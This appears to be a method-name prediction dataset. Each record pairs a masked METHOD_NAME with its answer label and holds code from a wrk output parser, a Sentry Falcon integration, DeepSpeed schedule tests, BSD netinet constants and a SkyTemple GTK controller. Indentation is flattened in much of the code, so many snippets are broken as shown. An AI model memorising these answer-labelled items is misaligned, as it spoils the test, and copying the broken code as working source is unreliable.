wrk_output.get('req_stdev')) + separator + str(wrk_output.get('req_max')) + separator + str(
wrk_output.get('lat_distrib_50%')) + separator + str(wrk_output.get('lat_distrib_75%')) + separator + str(
wrk_output.get('lat_distrib_90%')) + separator + str(wrk_output.get('lat_distrib_99%')) + separator + str(
wrk_output.get('bytes_sec_tot')) + separator + str(wrk_output.get('req_sec_tot')) + separator + str(
wrk_output.get('tot_requests')) + separator + str(wrk_output.get('tot_duration')) + separator + str(wrk_output.get('err_connect')) + separator + str(
wrk_output.get('err_read')) + separator + str(wrk_output.get('err_write')) + separator + str(
wrk_output.get('err_timeout'))
def get_bytes(size_str):
    x = re.search(r"^(\d+\.*\d*)(\w+)$", size_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return size_str
if suffix == 'b':
return size
elif suffix == 'kb' or suffix == 'kib':
return size * 1024
elif suffix == 'mb' or suffix == 'mib':
return size * 1024 ** 2
elif suffix == 'gb' or suffix == 'gib':
return size * 1024 ** 3
    elif suffix == 'tb' or suffix == 'tib':
        # 1 TiB = 1024 ** 4 bytes
        return size * 1024 ** 4
    elif suffix == 'pb' or suffix == 'pib':
        # 1 PiB = 1024 ** 5 bytes
        return size * 1024 ** 5
return False
def get_number(number_str):
    x = re.search(r"^(\d+\.*\d*)(\w*)$", number_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return number_str
if suffix == 'k':
return size * 1000
elif suffix == 'm':
return size * 1000 ** 2
    elif suffix == 'g':
        return size * 1000 ** 3
elif suffix == 't':
return size * 1000 ** 4
elif suffix == 'p':
return size * 1000 ** 5
else:
return size
return False
def get_ms(time_str):
    x = re.search(r"^(\d+\.*\d*)(\w*)$", time_str)
if x is not None:
size = float(x.group(1))
suffix = (x.group(2)).lower()
else:
return time_str
if suffix == 'us':
return size / 1000
elif suffix == 'ms':
return size
elif suffix == 's':
return size * 1000
elif suffix == 'm':
return size * 1000 * 60
elif suffix == 'h':
return size * 1000 * 60 * 60
else:
return size
return False
def parse_wrk_output(wrk_output):
retval = {}
for line in wrk_output.splitlines():
        x = re.search(r"^\s+Latency\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*).*$", line)
if x is not None:
retval['lat_avg'] = get_ms(x.group(1))
retval['lat_stdev'] = get_ms(x.group(2))
retval['lat_max'] = get_ms(x.group(3))
        x = re.search(r"^\s+Req/Sec\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*)\s+(\d+\.\d+\w*).*$", line)
if x is not None:
retval['req_avg'] = get_number(x.group(1))
retval['req_stdev'] = get_number(x.group(2))
retval['req_max'] = get_number(x.group(3))
        x = re.search(r"^\s+(\d+)\ requests in (\d+\.\d+\w*)\,\ (\d+\.\d+\w*)\ read.*$", line)
if x is not None:
retval['tot_requests'] = get_number(x.group(1))
retval['tot_duration'] = get_ms(x.group(2))
retval['read'] = get_bytes(x.group(3))
        x = re.search(r"^Requests\/sec\:\s+(\d+\.*\d*).*$", line)
if x is not None:
retval['req_sec_tot'] = get_number(x.group(1))
        x = re.search(r"^Transfer\/sec\:\s+(\d+\.*\d*\w+).*$", line)
        if x is not None:
            retval['bytes_sec_tot'] = get_bytes(x.group(1))
        x = re.search(
            r"^\s+Socket errors:\ connect (\d+\w*)\,\ read (\d+\w*)\,\ write\ (\d+\w*)\,\ timeout\ (\d+\w*).*$", line)
if x is not None:
retval['err_connect'] = get_number(x.group(1))
retval['err_read'] = get_number(x.group(2))
retval['err_write'] = get_number(x.group(3))
retval['err_timeout'] = get_number(x.group(4))
    x = re.search(r"^\s+Latency Distribution\s+50%\s+(\d+.\d+\w+)\s+75%\s+(\d+.\d+\w+)\s+90%\s+(\d+.\d+\w+)\s+99%\s+(\d+.\d+\w+).*$", wrk_output, re.M)
if x is not None:
retval['lat_distrib_50%'] = get_ms(x.group(1))
retval['lat_distrib_75%'] = get_ms(x.group(2))
retval['lat_distrib_90%'] = get_ms(x.group(3))
retval['lat_distrib_99%'] = get_ms(x.group(4))
if 'err_connect' not in retval:
retval['err_connect'] = 0
if 'err_read' not in retval:
retval['err_read'] = 0
if 'err_write' not in retval:
retval['err_write'] = 0
if 'err_timeout' not in retval:
retval['err_timeout'] = 0
return retval
def execute_wrk(cmd):
cmd = ' '.join([str(elem) for elem in cmd])
cmd = wrkcmd + ' ' + str(cmd)
process = subprocess.run(cmd.split(' '), check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = process.stdout
return output
def main(cmd):
print("****wrk output: \n")
wrk_output = execute_wrk(cmd)
print(str(wrk_output) + "\n")
print("****wrk output dict: \n")
wrk_output_dict = parse_wrk_output(wrk_output)
print(str(wrk_output_dict) + "\n")
print("****wrk output csv line: \n")
wrk_output_csv = METHOD_NAME(wrk_output_dict)
print(str(wrk_output_csv))
if __name__ == '__main__':
main(sys.argv[1:]) | null |
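# Hedged usage sketch: this script forwards its arguments verbatim to the `wrk`
# binary, so a typical invocation looks like the line below. The script name, URL,
# thread/connection counts and duration are placeholders; `--latency` is required
# so that wrk prints the latency-distribution block parsed above.
#
#     python3 wrk_parse.py -t4 -c64 -d30s --latency http://localhost:8080/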
set transaction name and source | from __future__ import absolute_import
from sentry_sdk.hub import Hub
from sentry_sdk.integrations import Integration, DidNotEnable
from sentry_sdk.integrations._wsgi_common import RequestExtractor
from sentry_sdk.integrations.wsgi import SentryWsgiMiddleware
from sentry_sdk.tracing import SOURCE_FOR_STYLE
from sentry_sdk.utils import (
capture_internal_exceptions,
event_from_exception,
parse_version,
)
from sentry_sdk._types import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any
from typing import Dict
from typing import Optional
from sentry_sdk._types import EventProcessor
# In Falcon 3.0 `falcon.api_helpers` is renamed to `falcon.app_helpers`
# and `falcon.API` to `falcon.App`
try:
import falcon # type: ignore
from falcon import __version__ as FALCON_VERSION
except ImportError:
raise DidNotEnable("Falcon not installed")
try:
import falcon.app_helpers # type: ignore
falcon_helpers = falcon.app_helpers
falcon_app_class = falcon.App
FALCON3 = True
except ImportError:
import falcon.api_helpers # type: ignore
falcon_helpers = falcon.api_helpers
falcon_app_class = falcon.API
FALCON3 = False
class FalconRequestExtractor(RequestExtractor):
def env(self):
# type: () -> Dict[str, Any]
return self.request.env
def cookies(self):
# type: () -> Dict[str, Any]
return self.request.cookies
def form(self):
# type: () -> None
return None # No such concept in Falcon
def files(self):
# type: () -> None
return None # No such concept in Falcon
def raw_data(self):
# type: () -> Optional[str]
# As request data can only be read once we won't make this available
# to Sentry. Just send back a dummy string in case there was a
# content length.
# TODO(jmagnusson): Figure out if there's a way to support this
content_length = self.content_length()
if content_length > 0:
return "[REQUEST_CONTAINING_RAW_DATA]"
else:
return None
if FALCON3:
def json(self):
# type: () -> Optional[Dict[str, Any]]
try:
return self.request.media
except falcon.errors.HTTPBadRequest:
return None
else:
def json(self):
# type: () -> Optional[Dict[str, Any]]
try:
return self.request.media
except falcon.errors.HTTPBadRequest:
# NOTE(jmagnusson): We return `falcon.Request._media` here because
# falcon 1.4 doesn't do proper type checking in
# `falcon.Request.media`. This has been fixed in 2.0.
# Relevant code: https://github.com/falconry/falcon/blob/1.4.1/falcon/request.py#L953
return self.request._media
class SentryFalconMiddleware(object):
"""Captures exceptions in Falcon requests and send to Sentry"""
def process_request(self, req, resp, *args, **kwargs):
# type: (Any, Any, *Any, **Any) -> None
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is None:
return
with hub.configure_scope() as scope:
scope._name = "falcon"
scope.add_event_processor(_make_request_event_processor(req, integration))
TRANSACTION_STYLE_VALUES = ("uri_template", "path")
class FalconIntegration(Integration):
identifier = "falcon"
transaction_style = ""
def __init__(self, transaction_style="uri_template"):
# type: (str) -> None
if transaction_style not in TRANSACTION_STYLE_VALUES:
raise ValueError(
"Invalid value for transaction_style: %s (must be in %s)"
% (transaction_style, TRANSACTION_STYLE_VALUES)
)
self.transaction_style = transaction_style
@staticmethod
def setup_once():
# type: () -> None
version = parse_version(FALCON_VERSION)
if version is None:
raise DidNotEnable("Unparsable Falcon version: {}".format(FALCON_VERSION))
if version < (1, 4):
raise DidNotEnable("Falcon 1.4 or newer required.")
_patch_wsgi_app()
_patch_handle_exception()
_patch_prepare_middleware()
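# Hedged usage sketch (illustrative only; nothing in this module calls it): an
# application enables the integration through ``sentry_sdk.init``. The DSN below is
# a placeholder, and ``transaction_style`` must be one of TRANSACTION_STYLE_VALUES.
def _example_enable_integration():
    # type: () -> None
    import sentry_sdk

    sentry_sdk.init(
        dsn="https://examplePublicKey@o0.ingest.sentry.io/0",
        integrations=[FalconIntegration(transaction_style="uri_template")],
    )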
def _patch_wsgi_app():
# type: () -> None
original_wsgi_app = falcon_app_class.__call__
def sentry_patched_wsgi_app(self, env, start_response):
# type: (falcon.API, Any, Any) -> Any
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is None:
return original_wsgi_app(self, env, start_response)
sentry_wrapped = SentryWsgiMiddleware(
lambda envi, start_resp: original_wsgi_app(self, envi, start_resp)
)
return sentry_wrapped(env, start_response)
falcon_app_class.__call__ = sentry_patched_wsgi_app
def _patch_handle_exception():
# type: () -> None
original_handle_exception = falcon_app_class._handle_exception
def sentry_patched_handle_exception(self, *args):
# type: (falcon.API, *Any) -> Any
# NOTE(jmagnusson): falcon 2.0 changed falcon.API._handle_exception
# method signature from `(ex, req, resp, params)` to
# `(req, resp, ex, params)`
if isinstance(args[0], Exception):
ex = args[0]
else:
ex = args[2]
was_handled = original_handle_exception(self, *args)
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is not None and _exception_leads_to_http_5xx(ex):
# If an integration is there, a client has to be there.
client = hub.client # type: Any
event, hint = event_from_exception(
ex,
client_options=client.options,
mechanism={"type": "falcon", "handled": False},
)
hub.capture_event(event, hint=hint)
return was_handled
falcon_app_class._handle_exception = sentry_patched_handle_exception
def _patch_prepare_middleware():
# type: () -> None
original_prepare_middleware = falcon_helpers.prepare_middleware
def sentry_patched_prepare_middleware(
middleware=None, independent_middleware=False
):
# type: (Any, Any) -> Any
hub = Hub.current
integration = hub.get_integration(FalconIntegration)
if integration is not None:
middleware = [SentryFalconMiddleware()] + (middleware or [])
return original_prepare_middleware(middleware, independent_middleware)
falcon_helpers.prepare_middleware = sentry_patched_prepare_middleware
def _exception_leads_to_http_5xx(ex):
# type: (Exception) -> bool
is_server_error = isinstance(ex, falcon.HTTPError) and (ex.status or "").startswith(
"5"
)
is_unhandled_error = not isinstance(
ex, (falcon.HTTPError, falcon.http_status.HTTPStatus)
)
return is_server_error or is_unhandled_error
def METHOD_NAME(event, transaction_style, request):
# type: (Dict[str, Any], str, falcon.Request) -> None
name_for_style = {
"uri_template": request.uri_template,
"path": request.path,
}
event["transaction"] = name_for_style[transaction_style]
event["transaction_info"] = {"source": SOURCE_FOR_STYLE[transaction_style]}
def _make_request_event_processor(req, integration):
# type: (falcon.Request, FalconIntegration) -> EventProcessor
def event_processor(event, hint):
# type: (Dict[str, Any], Dict[str, Any]) -> Dict[str, Any]
METHOD_NAME(event, integration.transaction_style, req)
with capture_internal_exceptions():
FalconRequestExtractor(req).extract_into_event(event)
return event
return event_processor | null |
test pipe inference schedule laststage | # Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: Apache-2.0
# DeepSpeed Team
import pytest
import deepspeed.runtime.pipe.schedule as schedule
def _count_type(cmds, classtype):
return len(list(filter(lambda c: type(c) == classtype, cmds)))
def test_pipe_inference_schedule_singlestage():
sched = schedule.InferenceSchedule(micro_batches=4, stages=1, stage_id=0)
assert sched.num_micro_batches == 4
full = list(iter(sched))
for idx, cmds in enumerate(full):
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
assert len(full) == sched.num_micro_batches
def test_pipe_train_schedule_singlestage():
sched = schedule.TrainSchedule(micro_batches=4, stages=1, stage_id=0)
assert sched.num_micro_batches == 4
full = list(iter(sched))
for idx, cmds in enumerate(full):
if (idx % 2) != 0:
assert (len(cmds) == 1) or (len(cmds) == 4)
assert type(cmds[0]) == schedule.BackwardPass
else:
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
assert len(full) == sched.num_micro_batches * 2
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def test_pipe_inference_schedule_firststage(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=0)
assert sched.num_micro_batches == micro_batches
full = list(iter(sched))
for idx, cmds in enumerate(full):
# Ensure we don't send an activation the first step
if idx == 0:
assert len(cmds) == 2
assert type(cmds[0]) == schedule.LoadMicroBatch
assert type(cmds[1]) == schedule.ForwardPass
assert cmds[0].buffer_id == cmds[1].buffer_id
continue
# the last active step is only a send
if idx == sched.num_micro_batches:
assert len(cmds) == 1
assert type(cmds[0]) == schedule.SendActivation
continue
# no work later on
if idx > sched.num_micro_batches:
assert len(cmds) == 0
continue
# Normally we need to load/forward/send
assert len(cmds) == 3
assert _count_type(cmds, schedule.LoadMicroBatch) == 1
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.SendActivation) == 1
assert len(full) == micro_batches + stages - 1
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def test_pipe_inference_schedule_midstage(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=1)
full = list(iter(sched))
for idx, cmds in enumerate(full):
if idx < sched.stage:
assert len(cmds) == 0
continue
if idx == sched.stage + sched.num_micro_batches:
assert len(cmds) == 1
assert type(cmds[0]) == schedule.SendActivation
continue
if idx > sched.stage + sched.num_micro_batches:
assert len(cmds) == 0
continue
assert _count_type(cmds, schedule.LoadMicroBatch) == 0
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.RecvActivation) == 1
if idx > sched.stage:
assert _count_type(cmds, schedule.SendActivation) == 1
assert len(full) == micro_batches + stages - 1
@pytest.mark.parametrize('micro_batches', [1, 3, 8, 10])
def METHOD_NAME(micro_batches, stages=3):
sched = schedule.InferenceSchedule(micro_batches=micro_batches, stages=stages, stage_id=2)
full = list(iter(sched))
for idx, cmds in enumerate(full):
if idx < sched.stage or idx > sched.stage + sched.num_micro_batches:
assert len(cmds) == 0
continue
assert _count_type(cmds, schedule.LoadMicroBatch) == 1
assert _count_type(cmds, schedule.ForwardPass) == 1
assert _count_type(cmds, schedule.RecvActivation) == 1
assert _count_type(cmds, schedule.SendActivation) == 0
assert len(full) == micro_batches + stages - 1
def test_pipe_schedule_firststage():
sched = schedule.TrainSchedule(micro_batches=8, stages=3, stage_id=0)
for cmds in sched:
assert all(instr.__class__ != schedule.SendGrad for instr in cmds)
assert all(instr.__class__ != schedule.RecvActivation for instr in cmds)
for instr in cmds:
if isinstance(instr, schedule.BufferOpInstruction):
assert 0 <= instr.buffer_id < sched.num_pipe_buffers()
def test_pipe_schedule_laststage():
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=2)
assert len(list(iter(sched))) == 2 * (sched.micro_batches + sched.stages - 1)
for cmds in sched:
assert all(instr.__class__ != schedule.SendActivation for instr in cmds)
assert all(instr.__class__ != schedule.RecvGrad for instr in cmds)
def test_pipe_stagequery():
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=0)
assert sched.is_first_stage
assert not sched.is_last_stage
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=1)
assert not sched.is_first_stage
assert not sched.is_last_stage
sched = schedule.TrainSchedule(stages=3, micro_batches=4, stage_id=2)
assert not sched.is_first_stage
assert sched.is_last_stage | null |
i n classb | # Generated by h2py from /usr/include/netinet/in.h
IPPROTO_IP = 0
IPPROTO_HOPOPTS = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_IPV4 = 4
IPPROTO_IPIP = IPPROTO_IPV4
IPPROTO_TCP = 6
IPPROTO_ST = 7
IPPROTO_EGP = 8
IPPROTO_PIGP = 9
IPPROTO_RCCMON = 10
IPPROTO_NVPII = 11
IPPROTO_PUP = 12
IPPROTO_ARGUS = 13
IPPROTO_EMCON = 14
IPPROTO_XNET = 15
IPPROTO_CHAOS = 16
IPPROTO_UDP = 17
IPPROTO_MUX = 18
IPPROTO_MEAS = 19
IPPROTO_HMP = 20
IPPROTO_PRM = 21
IPPROTO_IDP = 22
IPPROTO_TRUNK1 = 23
IPPROTO_TRUNK2 = 24
IPPROTO_LEAF1 = 25
IPPROTO_LEAF2 = 26
IPPROTO_RDP = 27
IPPROTO_IRTP = 28
IPPROTO_TP = 29
IPPROTO_BLT = 30
IPPROTO_NSP = 31
IPPROTO_INP = 32
IPPROTO_SEP = 33
IPPROTO_3PC = 34
IPPROTO_IDPR = 35
IPPROTO_XTP = 36
IPPROTO_DDP = 37
IPPROTO_CMTP = 38
IPPROTO_TPXX = 39
IPPROTO_IL = 40
IPPROTO_IPV6 = 41
IPPROTO_SDRP = 42
IPPROTO_ROUTING = 43
IPPROTO_FRAGMENT = 44
IPPROTO_IDRP = 45
IPPROTO_RSVP = 46
IPPROTO_GRE = 47
IPPROTO_MHRP = 48
IPPROTO_BHA = 49
IPPROTO_ESP = 50
IPPROTO_AH = 51
IPPROTO_INLSP = 52
IPPROTO_SWIPE = 53
IPPROTO_NHRP = 54
IPPROTO_ICMPV6 = 58
IPPROTO_NONE = 59
IPPROTO_DSTOPTS = 60
IPPROTO_AHIP = 61
IPPROTO_CFTP = 62
IPPROTO_HELLO = 63
IPPROTO_SATEXPAK = 64
IPPROTO_KRYPTOLAN = 65
IPPROTO_RVD = 66
IPPROTO_IPPC = 67
IPPROTO_ADFS = 68
IPPROTO_SATMON = 69
IPPROTO_VISA = 70
IPPROTO_IPCV = 71
IPPROTO_CPNX = 72
IPPROTO_CPHB = 73
IPPROTO_WSN = 74
IPPROTO_PVP = 75
IPPROTO_BRSATMON = 76
IPPROTO_ND = 77
IPPROTO_WBMON = 78
IPPROTO_WBEXPAK = 79
IPPROTO_EON = 80
IPPROTO_VMTP = 81
IPPROTO_SVMTP = 82
IPPROTO_VINES = 83
IPPROTO_TTP = 84
IPPROTO_IGP = 85
IPPROTO_DGP = 86
IPPROTO_TCF = 87
IPPROTO_IGRP = 88
IPPROTO_OSPFIGP = 89
IPPROTO_SRPC = 90
IPPROTO_LARP = 91
IPPROTO_MTP = 92
IPPROTO_AX25 = 93
IPPROTO_IPEIP = 94
IPPROTO_MICP = 95
IPPROTO_SCCSP = 96
IPPROTO_ETHERIP = 97
IPPROTO_ENCAP = 98
IPPROTO_APES = 99
IPPROTO_GMTP = 100
IPPROTO_IPCOMP = 108
IPPROTO_PIM = 103
IPPROTO_PGM = 113
IPPROTO_DIVERT = 254
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPROTO_DONE = 257
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPORT_HIFIRSTAUTO = 49152
IPPORT_HILASTAUTO = 65535
IPPORT_RESERVEDSTART = 600
def IN_CLASSA(i): return (((u_int32_t)(i) & 0x80000000) == 0)
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = 0x00ffffff
IN_CLASSA_MAX = 128
def METHOD_NAME(i): return (((u_int32_t)(i) & 0xc0000000) == 0x80000000)
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = 0x0000ffff
IN_CLASSB_MAX = 65536
def IN_CLASSC(i): return (((u_int32_t)(i) & 0xe0000000) == 0xc0000000)
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = 0x000000ff
def IN_CLASSD(i): return (((u_int32_t)(i) & 0xf0000000) == 0xe0000000)
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 28
IN_CLASSD_HOST = 0x0fffffff
def IN_MULTICAST(i): return IN_CLASSD(i)
def IN_EXPERIMENTAL(i): return (((u_int32_t)(i) & 0xf0000000) == 0xf0000000)
def IN_BADCLASS(i): return (((u_int32_t)(i) & 0xf0000000) == 0xf0000000)
INADDR_NONE = 0xffffffff
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 9
IP_MULTICAST_TTL = 10
IP_MULTICAST_LOOP = 11
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_MULTICAST_VIF = 14
IP_RSVP_ON = 15
IP_RSVP_OFF = 16
IP_RSVP_VIF_ON = 17
IP_RSVP_VIF_OFF = 18
IP_PORTRANGE = 19
IP_RECVIF = 20
IP_IPSEC_POLICY = 21
IP_FAITH = 22
IP_FW_ADD = 50
IP_FW_DEL = 51
IP_FW_FLUSH = 52
IP_FW_ZERO = 53
IP_FW_GET = 54
IP_FW_RESETLOG = 55
IP_DUMMYNET_CONFIGURE = 60
IP_DUMMYNET_DEL = 61
IP_DUMMYNET_FLUSH = 62
IP_DUMMYNET_GET = 64
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
IP_PORTRANGE_DEFAULT = 0
IP_PORTRANGE_HIGH = 1
IP_PORTRANGE_LOW = 2
IPPROTO_MAXID = (IPPROTO_AH + 1)
IPCTL_FORWARDING = 1
IPCTL_SENDREDIRECTS = 2
IPCTL_DEFTTL = 3
IPCTL_DEFMTU = 4
IPCTL_RTEXPIRE = 5
IPCTL_RTMINEXPIRE = 6
IPCTL_RTMAXCACHE = 7
IPCTL_SOURCEROUTE = 8
IPCTL_DIRECTEDBROADCAST = 9
IPCTL_INTRQMAXLEN = 10
IPCTL_INTRQDROPS = 11
IPCTL_STATS = 12
IPCTL_ACCEPTSOURCEROUTE = 13
IPCTL_FASTFORWARDING = 14
IPCTL_KEEPFAITH = 15
IPCTL_GIF_TTL = 16
IPCTL_MAXID = 17
# Included from netinet6/in6.h
# Included from sys/queue.h
def SLIST_HEAD_INITIALIZER(head): return \
def SLIST_ENTRY(type): return \
def STAILQ_HEAD_INITIALIZER(head): return \
def STAILQ_ENTRY(type): return \
def LIST_HEAD_INITIALIZER(head): return \
def LIST_ENTRY(type): return \
def TAILQ_HEAD_INITIALIZER(head): return \
def TAILQ_ENTRY(type): return \
def CIRCLEQ_ENTRY(type): return \
__KAME_VERSION = "20000701/FreeBSD-current"
IPV6PORT_RESERVED = 1024
IPV6PORT_ANONMIN = 49152
IPV6PORT_ANONMAX = 65535
IPV6PORT_RESERVEDMIN = 600
IPV6PORT_RESERVEDMAX = (IPV6PORT_RESERVED-1)
INET6_ADDRSTRLEN = 46
IPV6_ADDR_INT32_ONE = 1
IPV6_ADDR_INT32_TWO = 2
IPV6_ADDR_INT32_MNL = 0xff010000
IPV6_ADDR_INT32_MLL = 0xff020000
IPV6_ADDR_INT32_SMP = 0x0000ffff
IPV6_ADDR_INT16_ULL = 0xfe80
IPV6_ADDR_INT16_USL = 0xfec0
IPV6_ADDR_INT16_MLL = 0xff02
IPV6_ADDR_INT32_ONE = 0x01000000
IPV6_ADDR_INT32_TWO = 0x02000000
IPV6_ADDR_INT32_MNL = 0x000001ff
IPV6_ADDR_INT32_MLL = 0x000002ff
IPV6_ADDR_INT32_SMP = 0xffff0000
IPV6_ADDR_INT16_ULL = 0x80fe
IPV6_ADDR_INT16_USL = 0xc0fe
IPV6_ADDR_INT16_MLL = 0x02ff
def IN6_IS_ADDR_UNSPECIFIED(a): return \
def IN6_IS_ADDR_LOOPBACK(a): return \
def IN6_IS_ADDR_V4COMPAT(a): return \
def IN6_IS_ADDR_V4MAPPED(a): return \
IPV6_ADDR_SCOPE_NODELOCAL = 0x01
IPV6_ADDR_SCOPE_LINKLOCAL = 0x02
IPV6_ADDR_SCOPE_SITELOCAL = 0x05
IPV6_ADDR_SCOPE_ORGLOCAL = 0x08
IPV6_ADDR_SCOPE_GLOBAL = 0x0e
__IPV6_ADDR_SCOPE_NODELOCAL = 0x01
__IPV6_ADDR_SCOPE_LINKLOCAL = 0x02
__IPV6_ADDR_SCOPE_SITELOCAL = 0x05
__IPV6_ADDR_SCOPE_ORGLOCAL = 0x08
__IPV6_ADDR_SCOPE_GLOBAL = 0x0e
def IN6_IS_ADDR_LINKLOCAL(a): return \
def IN6_IS_ADDR_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return \
def IN6_IS_SCOPE_LINKLOCAL(a): return \
IPV6_OPTIONS = 1
IPV6_RECVOPTS = 5
IPV6_RECVRETOPTS = 6
IPV6_RECVDSTADDR = 7
IPV6_RETOPTS = 8
IPV6_SOCKOPT_RESERVED1 = 3
IPV6_UNICAST_HOPS = 4
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_LOOP = 11
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_PORTRANGE = 14
ICMP6_FILTER = 18
IPV6_PKTINFO = 19
IPV6_HOPLIMIT = 20
IPV6_NEXTHOP = 21
IPV6_HOPOPTS = 22
IPV6_DSTOPTS = 23
IPV6_RTHDR = 24
IPV6_PKTOPTIONS = 25
IPV6_CHECKSUM = 26
IPV6_BINDV6ONLY = 27
IPV6_IPSEC_POLICY = 28
IPV6_FAITH = 29
IPV6_FW_ADD = 30
IPV6_FW_DEL = 31
IPV6_FW_FLUSH = 32
IPV6_FW_ZERO = 33
IPV6_FW_GET = 34
IPV6_RTHDR_LOOSE = 0
IPV6_RTHDR_STRICT = 1
IPV6_RTHDR_TYPE_0 = 0
IPV6_DEFAULT_MULTICAST_HOPS = 1
IPV6_DEFAULT_MULTICAST_LOOP = 1
IPV6_PORTRANGE_DEFAULT = 0
IPV6_PORTRANGE_HIGH = 1
IPV6_PORTRANGE_LOW = 2
IPV6PROTO_MAXID = (IPPROTO_PIM + 1)
IPV6CTL_FORWARDING = 1
IPV6CTL_SENDREDIRECTS = 2
IPV6CTL_DEFHLIM = 3
IPV6CTL_DEFMTU = 4
IPV6CTL_FORWSRCRT = 5
IPV6CTL_STATS = 6
IPV6CTL_MRTSTATS = 7
IPV6CTL_MRTPROTO = 8
IPV6CTL_MAXFRAGPACKETS = 9
IPV6CTL_SOURCECHECK = 10
IPV6CTL_SOURCECHECK_LOGINT = 11
IPV6CTL_ACCEPT_RTADV = 12
IPV6CTL_KEEPFAITH = 13
IPV6CTL_LOG_INTERVAL = 14
IPV6CTL_HDRNESTLIMIT = 15
IPV6CTL_DAD_COUNT = 16
IPV6CTL_AUTO_FLOWLABEL = 17
IPV6CTL_DEFMCASTHLIM = 18
IPV6CTL_GIF_HLIM = 19
IPV6CTL_KAME_VERSION = 20
IPV6CTL_USE_DEPRECATED = 21
IPV6CTL_RR_PRUNE = 22
IPV6CTL_MAPPED_ADDR = 23
IPV6CTL_BINDV6ONLY = 24
IPV6CTL_RTEXPIRE = 25
IPV6CTL_RTMINEXPIRE = 26
IPV6CTL_RTMAXCACHE = 27
IPV6CTL_MAXID = 28 | null |
get view | # Copyright 2020-2023 Capypara and the SkyTemple Contributors
#
# This file is part of SkyTemple.
#
# SkyTemple is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SkyTemple is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SkyTemple. If not, see <https://www.gnu.org/licenses/>.
import logging
import os
import sys
from typing import TYPE_CHECKING, Optional, Dict, List
from xml.etree.ElementTree import Element, ElementTree
from skytemple.core.message_dialog import SkyTempleMessageDialog
from skytemple_files.common.xml_util import prettify
import cairo
from skytemple.core.error_handler import display_error
from skytemple_files.graphics.fonts.graphic_font.model import GraphicFont
from PIL import Image
from gi.repository import Gtk
from gi.repository.Gtk import ResponseType
from skytemple.controller.main import MainController
from skytemple.core.img_utils import pil_to_cairo_surface
from skytemple.core.module_controller import AbstractController
from skytemple_files.common.i18n_util import f, _
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from skytemple.module.misc_graphics.module import MiscGraphicsModule, FontOpenSpec
IMAGE_ZOOM = 4
MAX_ENTRIES = 10000
class GraphicFontController(AbstractController):
def __init__(self, module: 'MiscGraphicsModule', item: 'FontOpenSpec'):
self.module = module
self.spec = item
self.font: GraphicFont = self.module.get_graphic_font(self.spec) # type: ignore
assert self.font is not None
self.builder: Gtk.Builder = None # type: ignore
def METHOD_NAME(self) -> Gtk.Widget:
self.builder = self._get_builder(__file__, 'graphic_font.glade')
self._init_font()
self.builder.connect_signals(self)
self.builder.get_object('draw').connect('draw', self.draw)
